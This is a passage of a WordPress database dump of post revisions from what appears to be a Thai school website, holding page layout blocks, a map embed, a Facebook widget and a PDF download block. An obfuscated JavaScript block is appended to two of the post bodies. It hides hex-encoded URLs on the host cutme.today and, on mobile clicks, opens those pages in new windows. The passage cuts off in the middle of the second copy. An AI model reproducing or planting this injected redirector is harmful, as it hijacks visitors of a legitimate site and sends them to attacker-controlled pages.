src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-21 09:59:58','2024-08-21 02:59:58','',14,'http://pakhaeng.ssk.in.th/?p=1035',0,'revision','',0),
(1036,1,'2024-08-21 10:01:00','2024-08-21 03:01:00','<!-- wp:file {\"id\":1037,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน\"></object><a id=\"wp-block-file--media-542a3402-80d1-4f72-b19d-ca93d9a54dde\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน-1.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-542a3402-80d1-4f72-b19d-ca93d9a54dde\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 